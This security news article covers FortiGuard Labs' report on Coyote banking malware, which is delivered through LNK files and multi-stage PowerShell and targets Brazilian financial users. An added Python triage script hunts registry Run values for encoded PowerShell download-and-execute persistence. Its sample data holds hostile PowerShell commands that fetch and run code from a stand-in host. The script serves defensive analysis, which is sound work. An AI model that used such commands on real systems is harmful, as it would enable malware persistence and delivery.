FortiGuard Labs has discovered a sophisticated new attack chain involving malicious Windows Shortcut (LNK) files designed to deploy the notorious Coyote banking malware. The trojan primarily targets users in Brazil, specifically aiming to steal sensitive data from over 70 financial applications and a variety of websites.
The LNK files contain embedded PowerShell commands and initiate a series of operations that ultimately lead to the installation of the trojan on victim systems.
Coyote is capable of executing a range of malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal user credentials.
FortiGuard Labs says that, over the past month, it has uncovered several instances of LNK file artifacts containing embedded PowerShell commands that fetch subsequent malicious payloads from remote servers, starting a multi-stage infection process.
Coyote was initially documented in early 2024 and has since been linked to targeted attacks against Brazilian users. In addition to financial applications, the malware now also targets a broader range of websites, including those related to e-commerce and tourism.
In the latest observed infection sequence, an LNK file executes a PowerShell script that retrieves another PowerShell script from a remote server. The injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads. The payloads then establish persistence on the infected machine by modifying the Windows registry, ensuring the malware remains active even after a system reboot.
The malware's persistence mechanism involves creating a new registry entry with a random name that points to a PowerShell command. This command fetches content from a Base64-encoded URL and executes it, facilitating the execution of the Coyote banking trojan's main functions. Once activated, the trojan collects basic system information and a list of installed antivirus products before exfiltrating the data to a remote server. It also uses various evasion techniques to avoid detection by security measures such as sandboxes and virtual environments.
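The persistence pattern described above (a randomly named Run value launching PowerShell that decodes a Base64 string and fetches/executes code from it) can be hunted for in a registry export. The following is an added example written for this article, not FortiGuard's code; the Run values, the value names, and the host example.invalid are constructed, and the "random name" heuristic is an assumption, not something the article specifies.

```python
import base64
import re

# Traits the article describes: a Run value that launches PowerShell, carries Base64 (an -EncodedCommand or an inline FromBase64String literal) and fetches/executes remote code.
PS_RE = re.compile(r"\b(?:powershell(?:\.exe)?|pwsh)\b", re.I)
ENC_CMD_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_LIT_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]", re.I)
FETCH_EXEC_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|\biex\b|Invoke-Expression", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

def decode_b64(blob: str, utf16: bool) -> str:
    """-EncodedCommand payloads are UTF-16LE; inline FromBase64String literals are usually UTF-8."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16-le" if utf16 else "utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def looks_random(name: str) -> bool:
    """Assumed heuristic for the random value names the article mentions: alphanumeric, has digits, few vowels."""
    letters = [c for c in name if c.isalpha()]
    return (len(name) >= 6 and name.isalnum() and any(c.isdigit() for c in name) and bool(letters)
            and sum(c in "aeiouAEIOU" for c in letters) / len(letters) < 0.25)

def assess_run_value(name: str, command: str) -> dict:
    """Score one Run-key value; returns the indicators hit and any URL recovered from decoded Base64."""
    indicators = {"random_value_name": looks_random(name), "powershell": bool(PS_RE.search(command))}
    decoded = [decode_b64(m, True) for m in ENC_CMD_RE.findall(command)]
    decoded += [decode_b64(m, False) for m in B64_LIT_RE.findall(command)]
    indicators["base64_payload"] = bool(decoded)
    texts = [command] + decoded  # search the raw command and every decoded layer
    indicators["fetch_or_exec"] = any(FETCH_EXEC_RE.search(t) for t in texts)
    urls = sorted({u for t in texts for u in URL_RE.findall(t)})
    hit = [k for k, v in indicators.items() if v]
    return {"name": name, "indicators": hit, "urls": urls, "score": len(hit)}

def scan_run_values(values: dict) -> list:
    hits = [assess_run_value(n, c) for n, c in values.items()]
    return sorted((h for h in hits if h["score"] >= 3), key=lambda h: -h["score"])

# Constructed sample Run values (a stand-in for a registry export); example.invalid is not a real host.
_ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')".encode("utf-16-le")).decode()
_B64_URL = base64.b64encode(b"http://example.invalid/stage2").decode()
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Xk7q2Lm9": "powershell.exe -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString("
                f"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_B64_URL}')))\"",
    "UpdaterSvc": f"powershell -EncodedCommand {_ENC}",
}
```

Feeding `scan_run_values` the output of a `reg export` of the Run keys gives a triage list with the decoded download URLs, which is what an analyst needs to block or pivot on.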
A significant development in this new variant of Coyote is the expansion of its target list, which now includes 1,030 websites and 73 financial institutions. When a victim attempts to access any of the sites, Coyote can trigger a variety of malicious actions, from capturing screenshots to serving phishing overlays. Additionally, the malware can activate a keylogger and alter display settings to further deceive the victim.
“Coyote's infection process is complex and multi-staged. This attack leveraged an LNK file for initial access, which subsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets,” the researchers warned.